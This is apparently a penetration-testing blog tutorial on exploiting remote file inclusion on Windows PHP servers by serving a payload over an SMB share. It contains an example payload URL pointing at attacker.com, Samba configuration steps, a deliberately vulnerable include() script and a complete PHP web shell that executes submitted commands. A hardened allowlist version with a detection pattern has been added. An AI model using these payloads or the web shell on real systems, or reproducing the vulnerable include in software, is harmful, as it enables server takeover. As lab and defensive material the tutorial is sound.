During a recent pentest, we came up against a web vulnerability that we thought we had perfectly mastered. Today we are going to talk about remote file inclusion, also called RFI.


RFI 101

The purpose of this article is not to teach the most neophyte among you what an RFI is, so we will only skim over it. In short, an RFI is a web attack that makes the targeted site execute code fetched from another server. The result of this attack is code execution on the targeted server, which is called RCE (remote code execution).

Here is an example of an RFI exploitation:

http://victim.com/?page=http://attacker.com/webshell.php

For more information about exploiting an RFI vulnerability, we highly suggest you have a look at the two very interesting articles referenced below.


WHY WINDOWS?

During this pentest, we therefore tried to exploit this vulnerability, in vain. It was impossible to make the server send us an HTTP request, most likely because of a firewall. We therefore had to be cunning and find a way to make it send a request over a protocol that gives access to a shared resource on the network.

So, to move forward, we will use SMB (Server Message Block), a protocol that allows, among other things, sharing resources across the network. If we set up a Samba server on our Linux machine and share a web shell on it, we should be able to retrieve it through our RFI.

The payload would become:

http://victim.com/?page=\\IP\SHARE\webshell.php

We are done with the theory. Let's practice now!


RFI VIA SMB POC

We will first create a Samba server on a Linux machine. This of course assumes that Samba is already installed on it; if that is not the case, install it now.

Install Samba

If you are using Debian or Ubuntu, Samba can be installed using the below command:

sudo apt install samba

If you are using another Linux distribution, we invite you to ask your best friend Google (https://google.com/) how to set up Samba on your machine.

Create A Folder

mkdir ~/sambalab
chmod 0555 ~/sambalab
chown nobody:nogroup ~/sambalab

Setup the Samba configuration

To configure your Samba server properly, edit the file located at /etc/samba/smb.conf as per the example given below:

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = shell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[rfi]
path = /home/[username]/sambalab
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

Make sure to replace the placeholder [username] with the username matching your environment.

Restart the Service

sudo systemctl restart smbd

For the purpose of this article, we'll create a small PHP file called vuln.php containing the following vulnerable piece of code to simulate our remote file inclusion:

<?php
// Deliberately vulnerable: the user-controlled "page" parameter is passed
// straight to include(), so any path or URL the server can reach gets executed.
if(isset($_GET['page']))
{
include($_GET['page']);
}

echo "Blog POC";
?>
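As an added example (not part of the original post), here is a hardened counterpart to vuln.php. The request parameter is only ever used as a key into a fixed allowlist, so neither http:// URLs nor \\host\share UNC paths can reach include(); this matters because allow_url_include=Off only blocks PHP's URL stream wrappers, while a UNC path is resolved by the Windows filesystem layer. The pages directory and file names are hypothetical.

```php
<?php
// Added example, not from the original post: allowlist-based page loading.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';   // hypothetical template directory
const ALLOWED_PAGES = [                  // request key => file inside PAGES_DIR
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolvePage(string $requested): ?string
{
    // Only known keys are accepted; the raw value never becomes a path.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    // Defence in depth: the resolved file must really live under PAGES_DIR,
    // even if the allowlist is edited carelessly later on.
    $candidate = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    $base      = realpath(PAGES_DIR);
    if ($candidate === false || $base === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

function looksLikeInclusionAttempt(string $value): bool
{
    // A URL scheme (http://, ftp://, ...) or a UNC prefix (\\ or //) in the
    // page parameter is the signature of an RFI attempt worth logging.
    return (bool) preg_match('#^(?:[a-z][a-z0-9+.-]*://|\\\\\\\\|//)#i', $value);
}

$requested = (string) ($_GET['page'] ?? 'home');
$file = resolvePage($requested);

if ($file === null) {
    if (looksLikeInclusionAttempt($requested)) {
        error_log('Rejected suspicious page parameter from '
            . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    }
    http_response_code(404);
    exit('Unknown page');
}

include $file;
echo "Blog POC";
```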

On the other side, on our Samba server, we will use a simple web shell as per the example below:

<?php
// Runs the submitted command and keeps its output for display below.
if(!empty($_POST['cmd']))
{
$cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<!-- By Artyum (https://github.com/artyuum) -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Web Shell</title>
<style>*{-webkit-box-sizing:border-box;box-sizing:border-box}body{font-family:sans-serif;color:rgba(0,0,0,.75)}main{margin:auto;max-width:850px}button,input,pre{border-radius:5px}button,input,pre{background-color:#efefef}label{display:block}input{width:100%;background-color:#efefef;border:2px solid transparent}input:focus{outline:0;background:0 0;border:2px solid #e6e6e6}button{border:none;cursor:pointer;margin-left:5px}button:hover{background-color:#e6e6e6}button,input,pre{padding:10px}.form-group{display:-webkit-box;display:-ms-flexbox;display:flex;padding:15px 0}</style>
</head>
<body>
<main>
<h1>Web Shell</h1>
<h2>Execute a command</h2>
<form method="post">
<label for="cmd"><strong>Command</strong></label>
<div class="form-group">
<input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'] ?? '', ENT_QUOTES, 'UTF-8') ?>"
onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
<button type="submit">Execute</button>
</div>
</form>
<?php if($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<h2>Output</h2>
<?php if(isset($cmd)): ?>
<pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
<?php else: ?>
<pre><small>No result.</small></pre>
<?php endif; ?>
<?php endif; ?>
</main>
</body>
</html>

From here, we just have to load our web shell in the browser via the following URL (the share name matches the [rfi] section of smb.conf):

localhost/vuln.php?page=\\192.168.88.243\rfi\webshell.php



CONCLUSION

Here we are! We now have a nice little web shell that allows us to execute commands directly on the server. Thank you for following this article, which is less technical than our usual ones. We wanted to share this technique anyway because we have seen very few articles about it on the net.